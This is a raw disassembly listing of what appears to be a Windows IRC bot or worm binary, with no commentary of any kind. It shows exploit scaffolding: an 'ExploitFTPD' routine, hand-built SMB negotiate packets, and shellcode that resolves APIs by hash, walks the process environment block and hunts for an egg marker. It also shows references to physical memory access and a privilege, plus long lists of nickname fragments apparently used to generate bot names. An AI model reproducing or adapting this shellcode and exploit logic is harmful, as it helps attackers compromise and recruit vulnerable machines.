aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_401311+DE�o
; sub_402190+39F�o
a0: ; DATA XREF: sub_401311+7C�o
; sub_401311+A8�o ...
unicode 0, <0>,0
asc_432D3C: ; DATA XREF: sub_401311+77�o
; sub_401311+A3�o ...
unicode 0, <x>,0
a__0: ; DATA XREF: sub_401311+30�o
; sub_4128D4+13�o ...
unicode 0, <.>,0
aSInactive db '%s Inactive',0 ; DATA XREF: sub_401408+51�o
aSCipS db '%s (CIP): %s',0 ; DATA XREF: sub_401408+2A�o
align 10h
aSStartedPortIF db '%s Started,Port: (%i), File: (%s)',0 ; DATA XREF: sub_401477+E1�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4015FC+3C�o
aSSDScanthreadD db '%s (%s:%d), ScanThread: (%d), SubThread: (%d)',0
; DATA XREF: sub_40178D+B8�o
align 10h
aZwopensection db 'ZwOpenSection',0 ; DATA XREF: sub_401C4A+23�o
align 10h
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_401C4A+1B�o
align 4
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_401C4A�o
align 4
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_401CB1+5D�o
align 4
off_432E04 dd offset aSystray_exe ; DATA XREF: sub_401D57+47�o
; "systray.exe"
aEvicePhysicalm:
unicode 0, <evice\PhysicalMemory>,0
align 4
aSesecuritypriv db 'SeSecurityPrivilege',0 ; DATA XREF: sub_40203F:loc_4020E5�o
a503 db '503',0Dh,0Ah,0 ; DATA XREF: sub_402190:loc_40269D�o
align 10h
a221 db '221',0Dh,0Ah,0 ; DATA XREF: sub_402190+4F2�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_402190+4E0�o
align 10h
a425 db '425',0Dh,0Ah,0 ; DATA XREF: sub_402190:loc_40264E�o
align 4
aSS_1 db '%s -> %s',0 ; DATA XREF: sub_402190+48E�o
align 4
a226 db '226',0Dh,0Ah,0 ; DATA XREF: sub_402190+448�o
align 4
a150 db '150',0Dh,0Ah,0 ; DATA XREF: sub_402190+3E7�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_402190+3D2�o
align 4
a200 db '200',0Dh,0Ah,0 ; DATA XREF: sub_402190+3AA�o
align 4
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_402190+369�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_402190+32B�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_402190+2F2�o
align 4
a230 db '230',0Dh,0Ah,0 ; DATA XREF: sub_402190+2CD�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_402190+2BC�o
align 4
a331 db '331',0Dh,0Ah,0 ; DATA XREF: sub_402190+297�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_402190+285�o
align 4
aSS_0 db '%s %s',0 ; DATA XREF: sub_402190+274�o
; sub_403B2C+2CF5�o ...
align 4
a220 db '220',0Dh,0Ah,0 ; DATA XREF: sub_402190:loc_40236A�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_40274D+2B�o
align 10h
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40281E+9C�o
; sub_41C090+6F�o
align 4
aSSDThreadSStop db '%s %s (%d thread(s) stopped).',0 ; DATA XREF: sub_40281E+78�o
; sub_41C090+30�o
align 4
aExploitftpd db 'ExploitFTPD',0 ; DATA XREF: sub_40281E+6E�o
; sub_40281E+92�o
align 8
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_402B3C+B2�o
align 4
dword_432F54 dd 10FF8h, 0 dword_432F5C dd 10FF8h dword_432F60 dd 7FFDF020h, 0 dword_432F68 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_432FF0 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_433020 dd 0 dd 800000D4h, 2 dup(0)
unk_433030 db 81h ; ; DATA XREF: sub_403036+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 10h
; =============== S U B R O U T I N E =======================================
sub_433080 proc near ; DATA XREF: .text:004030EA�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_43317C
push dword ptr [esi]
push 63D61209h
call sub_433192
mov [esi+8], eax
call sub_433145
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_433192
mov [esi+0Ch], eax
call sub_4330F7
push dword ptr [esi+4]
push 4C0297FAh
call sub_433192
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_433080 endp
; =============== S U B R O U T I N E =======================================
sub_4330F7 proc near ; CODE XREF: sub_433080+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_433120
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_4330F7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_433120 proc near ; CODE XREF: sub_4330F7+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_43312F: ; CODE XREF: sub_433120+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_43313C
inc ebx
jmp short loc_43312F
; ---------------------------------------------------------------------------
loc_43313C: ; CODE XREF: sub_433120+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_433120 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_433145 proc near ; CODE XREF: sub_433080+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_43315D: ; CODE XREF: sub_433145+1E�j
cmp [ecx], ebx
jz short loc_433165
mov ecx, [ecx]
jmp short loc_43315D
; ---------------------------------------------------------------------------
loc_433165: ; CODE XREF: sub_433145+1A�j
mov edx, edi
loc_433167: ; CODE XREF: sub_433145+2A�j
cmp [edx+4], ebx
jz short loc_433171
mov edx, [edx+4]
jmp short loc_433167
; ---------------------------------------------------------------------------
loc_433171: ; CODE XREF: sub_433145+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_433145 endp
; =============== S U B R O U T I N E =======================================
sub_43317C proc near ; CODE XREF: sub_433080+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_43317C endp
; =============== S U B R O U T I N E =======================================
sub_433192 proc near ; CODE XREF: sub_433080+16�p
; sub_433080+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_4331A8: ; CODE XREF: sub_433192+33�j
jecxz short loc_4331E2
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_4331B5: ; CODE XREF: sub_433192+2D�j
lodsb
cmp al, ah
jz short loc_4331C1
ror edi, 0Dh
add edi, eax
jmp short loc_4331B5
; ---------------------------------------------------------------------------
loc_4331C1: ; CODE XREF: sub_433192+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_4331A8
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_4331E2: ; CODE XREF: sub_433192:loc_4331A8�j
; sub_433192:loc_4331E2�j
jmp short loc_4331E2
sub_433192 endp
; ---------------------------------------------------------------------------
align 8
dword_4331E8 dd 0F254C481h, 0FFFFhdword_4331F0 dd 23h dword_4331F4 dd 60h dword_4331F8 dd 62B0606h, 2050501h, 0A0hdword_433204 dd 0A1h dword_433208 dd 3 aCccc db 'CCCC',0 ; DATA XREF: sub_402B3C+153�o
align 4
loc_433214: ; DATA XREF: sub_402B3C+E8�o
jmp short near ptr dword_43321C
; ---------------------------------------------------------------------------
db 6 dup(90h)
dword_43321C dd 0 aSSSExD db '%s %s -> %s (Ex: %d)',0 ; DATA XREF: .text:00403203�o
; sub_40B63F+182�o ...
align 4
off_433238 dd offset dword_433F38 ; DATA XREF: sub_403625+69�r
dd offset dword_433F34
dd offset dword_433F30
dd offset word_433F2C
dd offset dword_433F28
dd offset dword_433F24
dd offset dword_433F20
dd offset dword_433F1C
dd offset dword_433F18
dd offset dword_433F14
dd offset dword_433F10
dd offset dword_433F0C
dd offset dword_433F08
dd offset dword_433F04
dd offset dword_433F00
dd offset dword_433EFC
dd offset dword_433EF8
dd offset dword_433EF4
dd offset dword_433EF0
dd offset asc_432D3C ; "x"
dd offset word_433EEC
dd offset aV_0 ; "v"
dd offset aB_0 ; "b"
dd offset aN_0 ; "n"
dd offset aM_2 ; "m"
dd offset aQ_0 ; "Q"
dd offset aW ; "W"
dd offset aE_0 ; "E"
dd offset aR ; "R"
dd offset aT ; "T"
dd offset aY ; "Y"
dd offset aU_0 ; "U"
dd offset aI_0 ; "I"
dd offset aO_0 ; "O"
dd offset aP_3 ; "P"
dd offset aA_1 ; "A"
dd offset aS_5 ; "S"
dd offset aD ; "D"
dd offset aF ; "F"
dd offset aG ; "G"
dd offset asc_433E9C ; "H"
dd offset aJ ; "J"
dd offset aK_0 ; "K"
dd offset asc_433E90 ; "L"
dd offset aZ_3 ; "Z"
dd offset asc_433E88 ; "X"
dd offset aC ; "C"
dd offset aV ; "V"
dd offset aB ; "B"
dd offset aN ; "N"
dd offset aM_1 ; "M"
dd offset aSm4rt3 ; "SM4RT3"
dd offset aFar0oq ; "far0oq"
dd offset aMax1xguy ; "max1xguy"
dd offset aB0bm4rl3y ; "B0BM4RL3Y"
dd offset aEmilya ; "emilya"
dd offset aEmilyia ; "Emilyia"
dd offset aKr1zha ; "KR1ZHA"
dd offset aC4r1nna ; "C4r1nna"
dd offset aSw1n ; "sw1n"
dd offset aM4le ; "m4le"
dd offset aKok00 ; "kok00"
dd offset aFl3xxxt3r ; "fl3xxxt3r"
dd offset aK3nnn ; "k3nnn"
dd offset aXc4libr3 ; "xc4libr3"
dd offset aXtcXcal ; "xTc-xCaL"
dd offset aPwntuuuu ; "pwntuuuu"
dd offset aShezzza ; "Shezzza"
dd offset aTalika ; "Talika"
dd offset aM4rcy ; "m4rcy"
dd offset aSeiny ; "seiny"
dd offset aSe1nf3ld ; "se1nf3ld"
dd offset aCmecme ; "cmecme"
dd offset aHev4l ; "hev4l"
dd offset aBunty007 ; "bunty007"
dd offset aJann0 ; "jann0"
dd offset aR1mpy ; "r1mpy"
dd offset aH4xdd ; "h4xdd-"
dd offset aNastsha ; "nastsha"
dd offset aLisau ; "Lisau"
dd offset aTr0ll3r ; "tr0ll3r"
dd offset aM4n4e ; "m4n4e"
dd offset aK3rm1t ; "k3rm1t"
dd offset aPur3g0ld ; "pur3g0ld"
dd offset aC0redumpdd ; "C0reDumpDd"
dd offset aIiimra ; "iiimra"
dd offset aGirlzx ; "GirLzx"
dd offset aCam3l ; "CAM3L-"
dd offset aReshma ; "reshma"
dd offset aK3ncing ; "K3ncing"
dd offset aR45h3r ; "R45H3R"
dd offset aC4nsuu ; "c4nsuu"
dd offset aKandent ; "kandent"
dd offset aErk4nerkali ; "erk4nerkali"
dd offset aHexa4a ; "hexa4a"
dd offset aBerkkkko ; "berkkkko"
dd offset aBenibi ; "BeNiBi"
dd offset aIrm4ll ; "irm4Ll"
dd offset aMizsund4y ; "mizsund4y"
dd offset aTolga38 ; "Tolga38"
dd offset aJer1cho ; "JER1CHO"
dd offset aM4ry ; "M4RY-"
dd offset aAk1n ; "AK1N"
dd offset aMel3kk ; "mel3kk"
dd offset aTrr3nd ; "trr3nd"
dd offset aMERV ; "M-E-R-V"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSud3nur ; "SUD3NUR"
dd offset aR0t0r ; "r0t0r-"
dd offset aR0t0 ; "r0t0"
dd offset aSmokeySn ; "smokey-sn"
dd offset aSmok3yS ; "smok3y-s"
dd offset aR0t0r ; "r0t0r-"
dd offset aRyann ; "ryann"
dd offset aNils ; "Nils-"
dd offset aDog ; "dog-"
dd offset aD_ ; "d_"
dd offset a_d ; "_d"
dd offset aBl0ndu ; "Bl0ndu"
dd offset aAkw1dz ; "AKW1Dz"
dd offset aRot0r ; "rot0r"
dd offset aBlondu ; "Blondu-"
dd offset aXc4l ; "XC4L"
dd offset aXtczzz ; "xTczzz"
dd offset aDczz ; "dczz"
dd offset aAhm3txtc ; "Ahm3tXTC"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiram1t ; "PIRAM1T"
dd offset aSamy3li ; "samy3li"
dd offset aRetg ; "RETG-"
dd offset aBlackp34rl ; "blackp34rl"
dd offset aPelinci ; "pelinci"
dd offset aAhm3t ; "ahm3t"
dd offset aTurkyballs ; "turkyballs"
dd offset aAnk32m ; "ank32m"
dd offset aAck0111 ; "ACK0111"
dd offset aIzm1rm ; "Izm1rm"
dd offset aAlb1na ; "alb1na"
dd offset aAyla ; "AYLA-"
dd offset aAte3e ; "AtE3e"
dd offset aAnkh4h ; "ankh4h"
dd offset aDonju4nm ; "Donju4nm"
dd offset aBog4c3r ; "bog4c3r"
dd offset aAlpay3m ; "alpay3m"
dd offset aCongu ; "CoNGU"
dd offset aDzlim ; "DzliM"
dd offset aDevran ; "DeVran"
dd offset aArd4k ; "ard4k"
dd offset aKeyifli ; "keyifli"
dd offset aMuratm_ ; "muratm_"
dd offset aHak4n3 ; "hak4n3"
dd offset aIrz4l ; "IRZ4L"
dd offset aAmth4n ; "AMTH4N"
dd offset aEmr3e ; "Emr3e"
dd offset aElm4zyok ; "elm4zyok"
dd offset aEsm3rkiz ; "Esm3rkiz"
dd offset aKeb1kec ; "keb1kec"
dd offset aFl0rd ; "FL0RD"
dd offset aH0ly1 ; "h0ly1"
dd offset aMahinure ; "MAHINURE"
dd offset aEllesme ; "Ellesme"
dd offset aAkut1 ; "akut1"
dd offset aKashmira ; "Kashmira"
dd offset aS3vis ; "S3ViS"
dd offset aSugaboi ; "SUGABOi"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAd4lim ; "AD4LIM"
dd offset aUmut00 ; "umut00"
dd offset aAnk32 ; "ANK32"
dd offset aDjmace ; "DJMACE"
dd offset aAnkart ; "Ankart"
dd offset aF3n3r ; "F3N3R"
dd offset aH4yr4n ; "h4yr4n"
dd offset aAng3lg4l ; "ang3lg4l"
dd offset aK4pk ; "k4pk"
dd offset aAchill3s ; "Achill3s"
dd offset aT3gm3n ; "T3GM3N"
dd offset aKot4n ; "kot4n"
dd offset aSevdan ; "sevdan"
dd offset aErkaaaa ; "ERKAAAA"
dd offset aAlcatrazak ; "alcatraZAK"
dd offset aA44mmm ; "a44mmm"
dd offset aB1rs3n ; "b1rs3n"
dd offset aYab4nc ; "yab4nc"
dd offset aD3vre ; "d3vre"
dd offset aErk3nnn ; "erk3nnn"
dd offset aAnkm4a ; "ankM4a"
dd offset aAd3m28 ; "Ad3m28"
dd offset aMaxs1lla ; "maxs1lla"
dd offset aM41st ; "M41ST"
dd offset aAd33 ; "Ad33"
dd offset aFirt ; "firt"
dd offset aAta29111 ; "Ata29111"
dd offset aK00oray ; "K00ORAY"
dd offset aAkd3nnan ; "akd3nnan"
dd offset aLizmirlm ; "Lizmirlm"
dd offset aUlaru ; "ularu"
dd offset aNe__ ; "NE__"
dd offset aPassenger ; "passenger"
dd offset aTr0pikal ; "tr0pikal"
dd offset aC00l30m ; "c00l30m"
dd offset aC3m39 ; "c3m39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN``"
dd offset aDallas ; "DALLAS"
dd offset aProm3theus ; "prom3theus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdammo ; "ADAMMO"
dd offset aCumhur ; "cumhur"
dd offset aBiatch ; "biatch"
dd offset aW4nt3d ; "W4NT3D"
align 10h
off_4335A0 dd offset aSh3x ; DATA XREF: sub_403625+4E�r
; sub_403625+F8�r
; "sh3x"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset aBad ; "bad"
dd offset aLag ; "lag"
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuf ; "|luf|"
dd offset aWikd ; "|wikd"
dd offset aSi ; "si}}"
dd offset aQ809 ; "Q809"
dd offset aDd8A ; "|dd8|a"
dd offset aB_0 ; "b"
dd offset word_433EEC
dd offset dword_433F0C
dd offset dword_433F30
dd offset dword_433F08
dd offset dword_433F04
dd offset dword_433F00
dd offset dword_433F1C
dd offset a__4 ; "_"
dd offset dword_433EFC
dd offset dword_433EF8
dd offset dword_433EF4
dd offset aM_2 ; "m"
dd offset aN_0 ; "n"
dd offset aO ; "o"
dd offset dword_433F18
dd offset dword_433F38
dd offset aRs ; "rs"
dd offset dword_433F28
dd offset dword_433F20
dd offset aV_0 ; "v"
dd offset dword_433F34
dd offset asc_432D3C ; "x"
dd offset dword_433F24
dd offset dword_433EF0
dd offset aHay ; "hay"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aDf ; "df"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTry ; "try"
dd offset aTrick ; "trick"
dd offset off_4337F8
dd offset dword_433EF0
dd offset dword_433F04
dd offset dword_433F10
dd offset dword_433F38
dd offset off_4337F4
dd offset dword_4337EC
dd offset dword_4337E4
dd offset dword_4337DC
dd offset off_4337D8
dd offset aF ; "F"
dd offset aM_1 ; "M"
dd offset aLuvu ; "LUVU"
dd offset aSad ; "Sad"
dd offset aAa ; "^AA^"
dd offset aB_0 ; "b"
dd offset byte_44D6A4
dd offset aSl33pin ; "Sl33piN"
dd offset byte_44D6A4
dd offset byte_44D6A4
dd offset aFook ; "|Fook|"
dd offset aFree ; "Free"
dd offset byte_44D6A4
dd offset byte_44D6A4
dd offset asc_433E88 ; "X"
dd offset byte_44D6A4
dd offset off_4337A8
dd offset aGirl ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset off_43378C
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0z ; "mof0z"
dd offset aMofoz ; "mofoz"
dd offset aTotz ; "totz"
dd offset aLol0lzz ; "lol0lzz"
dd offset aLololz ; "lololz"
dd offset dword_433750
dd offset dword_433748
dd offset dword_433740
dd offset dword_433738
dd offset dword_433734
dd offset dword_433730
dd offset dword_43372C
dword_43372C dd 7536h dword_433730 dd 7538h dword_433734 dd 347Ch dword_433738 dd 756F7934h, 7Dhdword_433740 dd 7C737534h, 0 dword_433748 dd 65657266h, 7Chdword_433750 dd 7C617Ch aLololz db 'lololz',0 ; DATA XREF: .text:0043370C�o
align 4
aLol0lzz db 'lol0lzz',0 ; DATA XREF: .text:00433708�o
aTotz db 'totz',0 ; DATA XREF: .text:00433704�o
align 4
aMofoz db 'mofoz',0 ; DATA XREF: .text:00433700�o
align 4
aMof0z db 'mof0z',0 ; DATA XREF: .text:004336FC�o
align 4
aMuha db 'muha',0 ; DATA XREF: .text:004336F8�o
align 4
aYeah db 'yeah',0 ; DATA XREF: .text:004336F4�o
align 4
off_43378C dd offset byte_616861 ; DATA XREF: .text:004336F0�o
aShit db 'shit',0 ; DATA XREF: .text:004336EC�o
align 4
aGurl db 'gurl',0 ; DATA XREF: .text:004336E8�o
align 10h
aGirl db 'GIRL',0 ; DATA XREF: .text:004336E4�o
align 4
off_4337A8 dd offset word_594F42 ; DATA XREF: .text:004336E0�o
aFree db 'Free',0 ; DATA XREF: .text:004336CC�o
align 4
aFook db '|Fook|',0 ; DATA XREF: .text:004336C8�o
align 4
aSl33pin db 'Sl33piN',0 ; DATA XREF: .text:004336BC�o
aAa db '^AA^',0 ; DATA XREF: .text:004336B0�o
align 4
aSad db 'Sad',0 ; DATA XREF: .text:004336AC�o
aLuvu db 'LUVU',0 ; DATA XREF: .text:004336A8�o
align 4
off_4337D8 dd offset byte_5F7C5F ; DATA XREF: .text:0043369C�o
dword_4337DC dd 58445B5Bh, 5D5Dhdword_4337E4 dd 69303077h, 2D7333hdword_4337EC dd 6C62627Ch, 0 off_4337F4 dd offset loc_425242 ; DATA XREF: .text:0043368C�o
off_4337F8 dd offset byte_63636D ; DATA XREF: .text:00433678�o
aTrick db 'trick',0 ; DATA XREF: .text:00433674�o
align 4
aTry db 'try',0 ; DATA XREF: .text:00433670�o
aLuvy db 'luvy',0 ; DATA XREF: .text:0043366C�o
align 10h
aUi db 'ui',0 ; DATA XREF: .text:00433668�o
align 4
aDf db 'df',0 ; DATA XREF: .text:00433664�o
align 4
aRt db 'rt',0 ; DATA XREF: .text:00433660�o
align 4
aGf db 'gf',0 ; DATA XREF: .text:0043365C�o
align 10h
aTy db 'ty',0 ; DATA XREF: .text:00433658�o
align 4
aRg db 'rg',0 ; DATA XREF: .text:00433654�o
align 4
aHay db 'hay',0 ; DATA XREF: .text:00433650�o
aRs db 'rs',0 ; DATA XREF: .text:00433630�o
align 10h
aO: ; DATA XREF: .text:00433624�o
unicode 0, <o>,0
a__4: ; DATA XREF: .text:0043360C�o
unicode 0, <_>,0
aDd8A db '|dd8|a',0 ; DATA XREF: .text:004335E8�o
align 10h
aQ809 db 'Q809',0 ; DATA XREF: .text:004335E4�o
align 4
aSi db 'si}}',0 ; DATA XREF: .text:004335E0�o
align 10h
aWikd db '|wikd',0 ; DATA XREF: .text:004335DC�o
align 4
aLuf db '|luf|',0 ; DATA XREF: .text:004335D8�o
align 10h
aGens db '{gens|',0 ; DATA XREF: .text:004335D4�o
align 4
aSex db '{sex}',0 ; DATA XREF: .text:004335D0�o
align 10h
aHub db '{hub}',0 ; DATA XREF: .text:004335CC�o
align 4
aLuck db '|luck|',0 ; DATA XREF: .text:004335C8�o
align 10h
aSuck db '|suck|',0 ; DATA XREF: .text:004335C4�o
align 4
aTot db '-|tot|',0 ; DATA XREF: .text:004335C0�o
align 10h
aWoh db '|woh|',0 ; DATA XREF: .text:004335BC�o
align 4
aTambe db '|tambe|',0 ; DATA XREF: .text:004335B8�o
aLag db 'lag',0 ; DATA XREF: .text:004335B4�o
aBad db 'bad',0 ; DATA XREF: .text:004335B0�o
aTree db 'tree',0 ; DATA XREF: .text:004335AC�o
align 10h
aZex db 'zex',0 ; DATA XREF: .text:004335A8�o
aLez db 'lez',0 ; DATA XREF: .text:004335A4�o
aSh3x db 'sh3x',0 ; DATA XREF: .text:off_4335A0�o
align 10h
aW4nt3d db 'W4NT3D',0 ; DATA XREF: .text:00433598�o
align 4
aBiatch db 'biatch',0 ; DATA XREF: .text:00433594�o
align 10h
aCumhur db 'cumhur',0 ; DATA XREF: .text:00433590�o
align 4
aAdammo db 'ADAMMO',0 ; DATA XREF: .text:0043358C�o
align 10h
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: .text:00433588�o
align 4
aProm3theus db 'prom3theus',0 ; DATA XREF: .text:00433584�o
align 4
aDallas db 'DALLAS',0 ; DATA XREF: .text:00433580�o
align 10h
aTeoman db 'TEOMAN``',0 ; DATA XREF: .text:0043357C�o
align 4
aRerpjj db 'RERPJJ',0 ; DATA XREF: .text:00433578�o
align 4
aC3m39 db 'c3m39',0 ; DATA XREF: .text:00433574�o
align 4
aC00l30m db 'c00l30m',0 ; DATA XREF: .text:00433570�o
aTr0pikal db 'tr0pikal',0 ; DATA XREF: .text:0043356C�o
align 10h
aPassenger db 'passenger',0 ; DATA XREF: .text:00433568�o
align 4
aNe__ db 'NE__',0 ; DATA XREF: .text:00433564�o
align 4
aUlaru db 'ularu',0 ; DATA XREF: .text:00433560�o
align 4
aLizmirlm db 'Lizmirlm',0 ; DATA XREF: .text:0043355C�o
align 4
aAkd3nnan db 'akd3nnan',0 ; DATA XREF: .text:00433558�o
align 4
aK00oray db 'K00ORAY',0 ; DATA XREF: .text:00433554�o
aAta29111 db 'Ata29111',0 ; DATA XREF: .text:00433550�o
align 4
aFirt db 'firt',0 ; DATA XREF: .text:0043354C�o
align 10h
aAd33 db 'Ad33',0 ; DATA XREF: .text:00433548�o
align 4
aM41st db 'M41ST',0 ; DATA XREF: .text:00433544�o
align 10h
aMaxs1lla db 'maxs1lla',0 ; DATA XREF: .text:00433540�o
align 4
aAd3m28 db 'Ad3m28',0 ; DATA XREF: .text:0043353C�o
align 4
aAnkm4a db 'ankM4a',0 ; DATA XREF: .text:00433538�o
align 4
aErk3nnn db 'erk3nnn',0 ; DATA XREF: .text:00433534�o
aD3vre db 'd3vre',0 ; DATA XREF: .text:00433530�o
align 4
aYab4nc db 'yab4nc',0 ; DATA XREF: .text:0043352C�o
align 4
aB1rs3n db 'b1rs3n',0 ; DATA XREF: .text:00433528�o
align 4
aA44mmm db 'a44mmm',0 ; DATA XREF: .text:00433524�o
align 4
aAlcatrazak db 'alcatraZAK',0 ; DATA XREF: .text:00433520�o
align 10h
aErkaaaa db 'ERKAAAA',0 ; DATA XREF: .text:0043351C�o
aSevdan db 'sevdan',0 ; DATA XREF: .text:00433518�o
align 10h
aKot4n db 'kot4n',0 ; DATA XREF: .text:00433514�o
align 4
aT3gm3n db 'T3GM3N',0 ; DATA XREF: .text:00433510�o
align 10h
aAchill3s db 'Achill3s',0 ; DATA XREF: .text:0043350C�o
align 4
aK4pk db 'k4pk',0 ; DATA XREF: .text:00433508�o
align 4
aAng3lg4l db 'ang3lg4l',0 ; DATA XREF: .text:00433504�o
align 10h
aH4yr4n db 'h4yr4n',0 ; DATA XREF: .text:00433500�o
align 4
aF3n3r db 'F3N3R',0 ; DATA XREF: .text:004334FC�o
align 10h
aAnkart db 'Ankart',0 ; DATA XREF: .text:004334F8�o
align 4
aDjmace db 'DJMACE',0 ; DATA XREF: .text:004334F4�o
align 10h
aAnk32 db 'ANK32',0 ; DATA XREF: .text:004334F0�o
align 4
aUmut00 db 'umut00',0 ; DATA XREF: .text:004334EC�o
align 10h
aAd4lim db 'AD4LIM',0 ; DATA XREF: .text:004334E8�o
align 4
aKumul db 'kumul',0 ; DATA XREF: .text:004334E4�o
align 10h
aUzgun36 db 'uzgun36',0 ; DATA XREF: .text:004334E0�o
aSugaboi db 'SUGABOi',0 ; DATA XREF: .text:004334DC�o
aS3vis db 'S3ViS',0 ; DATA XREF: .text:004334D8�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: .text:004334D4�o
align 4
aAkut1 db 'akut1',0 ; DATA XREF: .text:004334D0�o
align 4
aEllesme db 'Ellesme',0 ; DATA XREF: .text:004334CC�o
aMahinure db 'MAHINURE',0 ; DATA XREF: .text:004334C8�o
align 10h
aH0ly1 db 'h0ly1',0 ; DATA XREF: .text:004334C4�o
align 4
aFl0rd db 'FL0RD',0 ; DATA XREF: .text:004334C0�o
align 10h
aKeb1kec db 'keb1kec',0 ; DATA XREF: .text:004334BC�o
aEsm3rkiz db 'Esm3rkiz',0 ; DATA XREF: .text:004334B8�o
align 4
aElm4zyok db 'elm4zyok',0 ; DATA XREF: .text:004334B4�o
align 10h
aEmr3e db 'Emr3e',0 ; DATA XREF: .text:004334B0�o
align 4
aAmth4n db 'AMTH4N',0 ; DATA XREF: .text:004334AC�o
align 10h
aIrz4l db 'IRZ4L',0 ; DATA XREF: .text:004334A8�o
align 4
aHak4n3 db 'hak4n3',0 ; DATA XREF: .text:004334A4�o
align 10h
aMuratm_ db 'muratm_',0 ; DATA XREF: .text:004334A0�o
aKeyifli db 'keyifli',0 ; DATA XREF: .text:0043349C�o
aArd4k db 'ard4k',0 ; DATA XREF: .text:00433498�o
align 4
aDevran db 'DeVran',0 ; DATA XREF: .text:00433494�o
align 10h
aDzlim db 'DzliM',0 ; DATA XREF: .text:00433490�o
align 4
aCongu db 'CoNGU',0 ; DATA XREF: .text:0043348C�o
align 10h
aAlpay3m db 'alpay3m',0 ; DATA XREF: .text:00433488�o
